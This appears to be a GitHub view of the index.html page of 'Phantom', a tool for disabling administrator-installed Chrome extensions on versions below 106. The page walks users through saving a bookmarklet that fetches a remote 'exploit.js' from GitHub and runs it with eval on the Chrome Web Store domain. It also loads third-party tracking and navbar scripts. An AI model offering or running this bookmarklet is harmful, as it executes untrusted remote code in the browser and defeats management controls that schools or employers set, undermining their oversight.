forked from SnesLover22/Phantom
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
36 lines (33 loc) · 2.1 KB
/
index.html
File metadata and controls
36 lines (33 loc) · 2.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>Phantom</title>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link
href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"
rel="stylesheet">
<link rel="icon" type="image/x-icon" href="logo.png">
<link rel="stylesheet" href="evade.css">
<script src="script.js"></script>
<script async src="https://api.countapi.xyz/hit/detoxnetwork/3a67df84-f298-4a3c-bad6-ad1d5bd9b3af?callback=websiteVisits"></script>
</head>
<body>
<code id="navbar"></code>
<script src="https://new-navbar.detoxnetwork.repl.co/index.min.js"></script>
<h3><span style="color: #ff4e01">Phantom</span> is a way to disable any extension installed by your administrator.<br>Use
this with extreme caution. <br><i><span style="font-weight: 500; color: #ff4e01">Note: this will not work in the
newest versions of Chrome! Check you chrome version on chrome://version. Anything below v106 will work.</span></i></h3>
<h2>How to Disable Extensions:</h2>
<p>1. Right click this <a class="button"
href="javascript:void fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(d=>d.text()).then(eval);">code</a>
and "Copy link address".<br><br>2. Bookmark this page then right click it and "Edit" it.<br><br>3. Then paste the code you just copied into the "URL" box and name it whatever you want.<br><br>4. Go to this <a class="button" href="https://chrome.google.com/webstorex">page</a>
and click the bookmark when you get there. (It will bring you to a 404 page, this is not an error!)</p>
<script async src="https://arc.io/widget.min.js#ziHk1RQh"></script>
<script src="script.js"></script>
<link href="style.css" rel="stylesheet" type="text/css" />
</html>
</body>